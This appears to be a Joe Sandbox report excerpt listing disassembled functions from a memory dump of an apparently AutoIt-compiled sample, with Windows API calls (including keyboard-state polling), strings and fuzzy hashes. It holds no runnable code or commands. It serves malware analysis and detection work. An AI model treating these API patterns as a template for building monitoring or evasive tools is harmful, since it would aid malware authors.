Part of subcall function 00A03EBE: _wcscpy.LIBCMT ref: 00A03EF6

Part of subcall function 00A1386D: _iswctype.LIBCMT ref: 00A13875

Strings

Bad directive syntax error, xrefs: 00A4008F
EA06, xrefs: 00A3FD48
Unterminated string, xrefs: 00A400D6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00A3FD17
AU3!, xrefs: 00A02A93
Error opening the file, xrefs: 00A3FD33, 00A3FDAA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: 585b6756b9c81527aa79df74d064f615eb7c5d01dd6c813873dd5db4561cd85f
Instruction ID: c80cf1129ef2280916c6e9c29f21ad8cbcc363aba2217ee0bb153faaef3918cc
Opcode Fuzzy Hash: 585b6756b9c81527aa79df74d064f615eb7c5d01dd6c813873dd5db4561cd85f
Instruction Fuzzy Hash: 7F02BD715083459FC724EF24DA81AAFBBF5BF89344F10092DF589932A2DB30DA49CB42

Function 00A5AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00A80980), ref: 00A5AF4E
GetDriveTypeW.KERNEL32(00000061,00AAB5F0,00000061), ref: 00A5B018
_wcscpy.LIBCMT ref: 00A5B042

Strings

fixed, xrefs: 00A5AF96
network, xrefs: 00A5AFAC
cdrom, xrefs: 00A5AF6A
ramdisk, xrefs: 00A5AFC2
all, xrefs: 00A5AF54
removable, xrefs: 00A5AF80
unknown, xrefs: 00A5AFD9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: c2325e11efcba946070eb73f64a9231b27b2a0bd89d1134a0805395f8c3206fd
Instruction ID: f36b5ae102bd28caddace3eec7addd2b33f1034fb6c47c1720d2adcb248b649e
Opcode Fuzzy Hash: c2325e11efcba946070eb73f64a9231b27b2a0bd89d1134a0805395f8c3206fd
Instruction Fuzzy Hash: 4251BA702283099FC310EF14D991AABB7A5FFA0301F504919F996572E2EB70ED4DCB62

Function 009F4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 009F4D62
__swprintf.LIBCMT ref: 009F4DAC
__i64tow.LIBCMT ref: 00A2DB3B

Strings

0x%p, xrefs: 00A2DB1D
True, xrefs: 00A2DAFC
%.15g, xrefs: 009F4DA6
False, xrefs: 00A2DB03

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: c196f4ff95386bbe1e245de736289f006352e8c399dc8ea6697b5936c939c25a
Instruction ID: a9682ea5e8de07e53a1404c806939468695a5455d50fc494a27fdc0132aa9e86
Opcode Fuzzy Hash: c196f4ff95386bbe1e245de736289f006352e8c399dc8ea6697b5936c939c25a
Instruction Fuzzy Hash: 4D41C771604209AFDB34DF78D942EBA73F8EB45340F20486EE649D72D2EA71E941C711

Function 00A77777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A7778F
CreateMenu.USER32 ref: 00A777AA
SetMenu.USER32(?,00000000), ref: 00A777B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A77846
IsMenu.USER32(?), ref: 00A7785C
CreatePopupMenu.USER32 ref: 00A77866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A77893
DrawMenuBar.USER32 ref: 00A7789B

Strings

F, xrefs: 00A77887
0, xrefs: 00A77785

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 89ff1e4805c94ae64d31053ab43cf60f715fc6df39996b4e2fc3de417cd2ed19
Instruction ID: 373f6422b44e72ba43dfe3dbb3f8ef1a019739bfad93d222b8a68a697677c79f
Opcode Fuzzy Hash: 89ff1e4805c94ae64d31053ab43cf60f715fc6df39996b4e2fc3de417cd2ed19
Instruction Fuzzy Hash: E4416775A00209EFDB10DFA4D888E9ABBB5FF49300F158128F949A7361D730A955CF60

Function 00A77AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A77B83
CreateCompatibleDC.GDI32(00000000), ref: 00A77B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A77B9D
SelectObject.GDI32(00000000,00000000), ref: 00A77BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A77BB0
DeleteDC.GDI32(00000000), ref: 00A77BB9
GetWindowLongW.USER32(?,000000EC), ref: 00A77BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A77BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A77BE3

Strings

static, xrefs: 00A77B1B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 9e47a4df8020f86bb3eaeee5142a76ca539dd77561a6ad2f3c81223e6d76ecd2
Instruction ID: 9f6bc39ba0c53444dc85854c3ce2996c51350b5b8734958892279cdb59fc1781
Opcode Fuzzy Hash: 9e47a4df8020f86bb3eaeee5142a76ca539dd77561a6ad2f3c81223e6d76ecd2
Instruction Fuzzy Hash: D5318D32104218ABDF119FA4DC49FDF3B69FF49320F108324FA5AA61A0C771D825DBA4

Function 00A17030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A1706B

Part of subcall function 00A18D58: __getptd_noexit.LIBCMT ref: 00A18D58

__gmtime64_s.LIBCMT ref: 00A17104
__gmtime64_s.LIBCMT ref: 00A1713A
__gmtime64_s.LIBCMT ref: 00A17157
__allrem.LIBCMT ref: 00A171AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A171C9
__allrem.LIBCMT ref: 00A171E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A171FE
__allrem.LIBCMT ref: 00A17215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A17233
__invoke_watson.LIBCMT ref: 00A172A4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: 980f0bd798115bbbf9d684a16aa59f833904ef1ec7df4acb1358ca360ea752da
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 6E711672A04716ABDB149F7DDD41BDEB3B9AF15320F14423AF514E7281E770DA808B90

Function 00A52CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A52CE9
GetMenuItemInfoW.USER32(00AB7890,000000FF,00000000,00000030), ref: 00A52D4A
SetMenuItemInfoW.USER32(00AB7890,00000004,00000000,00000030), ref: 00A52D80
Sleep.KERNEL32(000001F4), ref: 00A52D92
GetMenuItemCount.USER32(?), ref: 00A52DD6
GetMenuItemID.USER32(?,00000000), ref: 00A52DF2
GetMenuItemID.USER32(?,-00000001), ref: 00A52E1C
GetMenuItemID.USER32(?,?), ref: 00A52E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A52EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A52EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A52EDC

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 93dc03b0e67bc245a81b64cd0e187ee537191664077d731f906c2361cba25fde
Instruction ID: d226bea3616717f18982e257667defd2cdbe01e7c6293c7f397a6acabad45d4f
Opcode Fuzzy Hash: 93dc03b0e67bc245a81b64cd0e187ee537191664077d731f906c2361cba25fde
Instruction Fuzzy Hash: 4B617BB1900249AFDB21CFA4DD89EAEBFB9FB42306F144559FC41A7251D731AD0ADB20

Function 00A77548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A775CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A775CD
GetWindowLongW.USER32(?,000000F0), ref: 00A775F1
_memset.LIBCMT ref: 00A77602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A77614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A7768C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: cdddae980abc3244d287734d44927ded069369796ba4a6d51fefc86473a87b62
Instruction ID: bb9e14936eaee339821f89e7a86dbf0aa96e9295d29c6969c7c88d5027faf5ee
Opcode Fuzzy Hash: cdddae980abc3244d287734d44927ded069369796ba4a6d51fefc86473a87b62
Instruction Fuzzy Hash: 17617D75904208AFDB10DFA4CD85EEE77F8EB49710F108199FA18E72A2D770AD41DBA0

Function 00A477B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A477DD
SafeArrayAllocData.OLEAUT32(?), ref: 00A47836
VariantInit.OLEAUT32(?), ref: 00A47848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00A47868
VariantCopy.OLEAUT32(?,?), ref: 00A478BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00A478CF
VariantClear.OLEAUT32(?), ref: 00A478E4
SafeArrayDestroyData.OLEAUT32(?), ref: 00A478F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A478FA
VariantClear.OLEAUT32(?), ref: 00A4790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A47917

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 70939890b0355c39030e0b01bbae24e5169d3cca65ceb53897381e2d8ff4b7f7
Instruction ID: 5eccf0ac9c4612596c4cc1bfc91fbf695971589a772903a564b372d4195858e4
Opcode Fuzzy Hash: 70939890b0355c39030e0b01bbae24e5169d3cca65ceb53897381e2d8ff4b7f7
Instruction Fuzzy Hash: DF414439A04119DFDB04DFA8D848DEDBBB9FF48354F008069EA55A7261D770A94ACF90

Function 00A50508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A50530
GetAsyncKeyState.USER32(000000A0), ref: 00A505B1
GetKeyState.USER32(000000A0), ref: 00A505CC
GetAsyncKeyState.USER32(000000A1), ref: 00A505E6
GetKeyState.USER32(000000A1), ref: 00A505FB
GetAsyncKeyState.USER32(00000011), ref: 00A50613
GetKeyState.USER32(00000011), ref: 00A50625
GetAsyncKeyState.USER32(00000012), ref: 00A5063D
GetKeyState.USER32(00000012), ref: 00A5064F
GetAsyncKeyState.USER32(0000005B), ref: 00A50667
GetKeyState.USER32(0000005B), ref: 00A50679

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 40fbe778afc6874cbdcff64e786bb8d0fbcf01ab3cfa34ce3deac8555cec5649
Instruction ID: 858ad40ec147095727bb0f6a34a69a0b681a9e4974e11584607662759ae195db
Opcode Fuzzy Hash: 40fbe778afc6874cbdcff64e786bb8d0fbcf01ab3cfa34ce3deac8555cec5649
Instruction Fuzzy Hash: 764193705047CA6DFF7187648904BB6BEA07F51345F08805ADDC6479C2EBF899DC8BA2

Function 00A68AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

CoInitialize.OLE32 ref: 00A68AED
CoUninitialize.OLE32 ref: 00A68AF8
CoCreateInstance.OLE32(?,00000000,00000017,00A83BBC,?), ref: 00A68B58
IIDFromString.OLE32(?,?), ref: 00A68BCB
VariantInit.OLEAUT32(?), ref: 00A68C65
VariantClear.OLEAUT32(?), ref: 00A68CC6

Strings

NULL Pointer assignment, xrefs: 00A68B9D
Invalid parameter, xrefs: 00A68BE4
Failed to create object, xrefs: 00A68B63, 00A68C19

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 26b84797db7e3bfc4342ed70be2dfa0edd4869322453761c0463343ddf946b3c
Instruction ID: 2b1d95a91c80ed2b524d85e7f23d9330b4a541343bf4427ed832845e2db1f448
Opcode Fuzzy Hash: 26b84797db7e3bfc4342ed70be2dfa0edd4869322453761c0463343ddf946b3c
Instruction Fuzzy Hash: D3616E70208711AFC710DF54C889F6EB7F8AF89714F100959F9859B291CB78ED49CBA2

Function 00A5BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A5BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A5BB89
GetLastError.KERNEL32 ref: 00A5BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 00A5BC00

Strings

READONLY, xrefs: 00A5BBCB
INVALID, xrefs: 00A5BBD2
NOTREADY, xrefs: 00A5BBBF
READY, xrefs: 00A5BBD9
UNKNOWN, xrefs: 00A5BBB8

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 88947515b479fe0e400f61a95d7b9a1b63b6d079d3c62cd3a4e2b1b980ff1ffb
Instruction ID: fb966f417b99df5b0b40641d1a6754317ea56fafa02b607affebfad4ca0ebb61
Opcode Fuzzy Hash: 88947515b479fe0e400f61a95d7b9a1b63b6d079d3c62cd3a4e2b1b980ff1ffb
Instruction Fuzzy Hash: 1C31B235A10209AFCB10DF68CC85EBEB7B4FF44302F158066E905D72D6DBB19949CBA1

Function 00A49B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A4B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A49BCC
GetDlgCtrlID.USER32 ref: 00A49BD7
GetParent.USER32 ref: 00A49BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A49BF6
GetDlgCtrlID.USER32(?), ref: 00A49BFF
GetParent.USER32(?), ref: 00A49C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A49C1E

Strings

ListBox, xrefs: 00A49B89
ComboBox, xrefs: 00A49B54

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 243ad98fd9b4fc47552aa9dba09dae95067b3f146333355609810dc54e828a77
Instruction ID: 4eeebb9e59ed3e74ac0bc4ccc64156484795de3c0bf4e404d16beff82baa9d2f
Opcode Fuzzy Hash: 243ad98fd9b4fc47552aa9dba09dae95067b3f146333355609810dc54e828a77
Instruction Fuzzy Hash: 49219A75A00108BFDF04EBA0DC85EEFBBA9EF95310F100115B961932E1EB75882A9B20

Function 00A49C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A4B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A49CB5
GetDlgCtrlID.USER32 ref: 00A49CC0
GetParent.USER32 ref: 00A49CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A49CDF
GetDlgCtrlID.USER32(?), ref: 00A49CE8
GetParent.USER32(?), ref: 00A49D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A49D07

Strings

ListBox, xrefs: 00A49C74
ComboBox, xrefs: 00A49C3F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: bbd22b089093f89bc0ec0010f978c95d0f2559b467c5f739d5b18fba00ad4a6d
Instruction ID: 73bc3665c2842e9f8e45ebaf9a0333b16459f77055e314e44893161431a8f416
Opcode Fuzzy Hash: bbd22b089093f89bc0ec0010f978c95d0f2559b467c5f739d5b18fba00ad4a6d
Instruction Fuzzy Hash: 69219D75E41108BFDB00EBA0CD85EFFBBB9EF95300F100115B95197291EB7589299B20

Function 00A49D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00A49D27
GetClassNameW.USER32(00000000,?,00000100), ref: 00A49D3C
_wcscmp.LIBCMT ref: 00A49D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A49DC9

Strings

smallicons, xrefs: 00A49D91
largeicons, xrefs: 00A49D5D
list, xrefs: 00A49DAB
details, xrefs: 00A49D77
SHELLDLL_DefView, xrefs: 00A49D48

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 31608f110d177412b6d68b6e1c36c0f32d83b3977d25d7f806c17d175a91f84d
Instruction ID: edbb12c00739ee44b9d4a4b9bbcd8bc8f382ef9278c45b7000b36e4fba19e90e
